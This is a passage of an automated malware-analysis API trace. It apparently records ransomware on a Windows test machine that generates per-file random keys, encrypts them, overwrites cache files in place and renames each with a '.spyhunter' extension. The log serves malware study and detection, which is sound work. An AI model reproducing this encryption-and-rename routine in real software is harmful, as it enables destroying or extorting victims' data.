HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.spyhunter")) returned 1 [0151.525] GetProcessHeap () returned 0x2c0000 [0151.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.525] GetProcessHeap () returned 0x2c0000 [0151.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.525] GetProcessHeap () returned 0x2c0000 [0151.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fecfc0 | out: hHeap=0x2c0000) returned 1 [0151.525] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecc0 | out: pbBuffer=0x270ecc0) returned 1 [0151.525] GetProcessHeap () returned 0x2c0000 [0151.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.526] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecb8*=0x30) returned 1 [0151.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0151.526] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".txt") returned 0x0 [0151.526] GetProcessHeap () returned 0x2c0000 [0151.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.527] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec7c*=0x18e, lpOverlapped=0x0) returned 1 [0151.527] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.527] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec7c*=0x18e, lpOverlapped=0x0) returned 1 [0151.527] GetProcessHeap () returned 0x2c0000 [0151.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.528] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.528] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x270ecbc*, lpNumberOfBytesWritten=0x270ec7c*=0x4, lpOverlapped=0x0) returned 1 [0151.528] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec7c*=0x30, lpOverlapped=0x0) returned 1 [0151.528] CloseHandle (hObject=0xa0) returned 1 [0151.528] GetProcessHeap () returned 0x2c0000 [0151.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.528] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.spyhunter") returned 162 [0151.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.spyhunter")) returned 1 [0151.529] GetProcessHeap () returned 0x2c0000 [0151.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.529] GetProcessHeap () returned 0x2c0000 [0151.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.529] GetProcessHeap () returned 0x2c0000 [0151.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fece38 | out: hHeap=0x2c0000) returned 1 [0151.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecb8 | out: pbBuffer=0x270ecb8) returned 1 [0151.529] GetProcessHeap () returned 0x2c0000 [0151.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.529] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecb0*=0x30) returned 1 [0151.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0151.534] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".txt") returned 0x0 [0151.534] GetProcessHeap () returned 0x2c0000 [0151.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.534] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec74*=0x18e, lpOverlapped=0x0) returned 1 [0151.535] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.535] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec74*=0x18e, lpOverlapped=0x0) returned 1 [0151.535] GetProcessHeap () returned 0x2c0000 [0151.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.535] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.535] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x270ecb4*, lpNumberOfBytesWritten=0x270ec74*=0x4, lpOverlapped=0x0) returned 1 [0151.535] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec74*=0x30, lpOverlapped=0x0) returned 1 [0151.535] CloseHandle (hObject=0xa0) returned 1 [0151.535] GetProcessHeap () returned 0x2c0000 [0151.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.536] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.spyhunter") returned 162 [0151.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.spyhunter")) returned 1 [0151.537] GetProcessHeap () returned 0x2c0000 [0151.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.537] GetProcessHeap () returned 0x2c0000 [0151.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.537] GetProcessHeap () returned 0x2c0000 [0151.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feccb0 | out: hHeap=0x2c0000) returned 1 [0151.537] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecb8 | out: pbBuffer=0x270ecb8) returned 1 [0151.537] GetProcessHeap () returned 0x2c0000 [0151.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.537] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecb0*=0x30) returned 1 [0151.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0151.539] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".txt") returned 0x0 [0151.539] GetProcessHeap () returned 0x2c0000 [0151.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.539] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec74*=0x192, lpOverlapped=0x0) returned 1 [0151.540] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.540] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec74*=0x192, lpOverlapped=0x0) returned 1 [0151.540] GetProcessHeap () returned 0x2c0000 [0151.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.540] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.540] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x270ecb4*, lpNumberOfBytesWritten=0x270ec74*=0x4, lpOverlapped=0x0) returned 1 [0151.540] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec74*=0x30, lpOverlapped=0x0) returned 1 [0151.540] CloseHandle (hObject=0xa0) returned 1 [0151.540] GetProcessHeap () returned 0x2c0000 [0151.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.540] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.spyhunter") returned 162 [0151.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.spyhunter")) returned 1 [0151.541] GetProcessHeap () returned 0x2c0000 [0151.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.541] GetProcessHeap () returned 0x2c0000 [0151.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.541] GetProcessHeap () returned 0x2c0000 [0151.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fecb28 | out: hHeap=0x2c0000) returned 1 [0151.541] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecb0 | out: pbBuffer=0x270ecb0) returned 1 [0151.541] GetProcessHeap () returned 0x2c0000 [0151.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.541] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270eca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270eca8*=0x30) returned 1 [0151.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0151.542] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".txt") returned 0x0 [0151.542] GetProcessHeap () returned 0x2c0000 [0151.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.543] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec6c*=0x204, lpOverlapped=0x0) returned 1 [0151.678] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.678] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x204, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec6c*=0x204, lpOverlapped=0x0) returned 1 [0151.678] GetProcessHeap () returned 0x2c0000 [0151.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.678] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.678] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x270ecac*, lpNumberOfBytesWritten=0x270ec6c*=0x4, lpOverlapped=0x0) returned 1 [0151.678] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec6c*=0x30, lpOverlapped=0x0) returned 1 [0151.678] CloseHandle (hObject=0xa0) returned 1 [0151.679] GetProcessHeap () returned 0x2c0000 [0151.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.679] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.spyhunter") returned 162 [0151.679] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.spyhunter")) returned 1 [0151.680] GetProcessHeap () returned 0x2c0000 [0151.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.680] GetProcessHeap () returned 0x2c0000 [0151.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.681] GetProcessHeap () returned 0x2c0000 [0151.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec9a0 | out: hHeap=0x2c0000) returned 1 [0151.681] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecb0 | out: pbBuffer=0x270ecb0) returned 1 [0151.681] GetProcessHeap () returned 0x2c0000 [0151.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.681] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270eca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270eca8*=0x30) returned 1 [0151.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0151.682] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".txt") returned 0x0 [0151.682] GetProcessHeap () returned 0x2c0000 [0151.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.682] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec6c*=0x182, lpOverlapped=0x0) returned 1 [0151.683] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.683] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec6c*=0x182, lpOverlapped=0x0) returned 1 [0151.855] GetProcessHeap () returned 0x2c0000 [0151.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.856] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.856] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x270ecac*, lpNumberOfBytesWritten=0x270ec6c*=0x4, lpOverlapped=0x0) returned 1 [0151.856] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec6c*=0x30, lpOverlapped=0x0) returned 1 [0151.856] CloseHandle (hObject=0xa0) returned 1 [0151.856] GetProcessHeap () returned 0x2c0000 [0151.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.856] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.spyhunter") returned 162 [0151.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.spyhunter")) returned 1 [0152.139] GetProcessHeap () returned 0x2c0000 [0152.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.139] GetProcessHeap () returned 0x2c0000 [0152.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.139] GetProcessHeap () returned 0x2c0000 [0152.139] HeapFree (in: hHeap=0x2c0000, 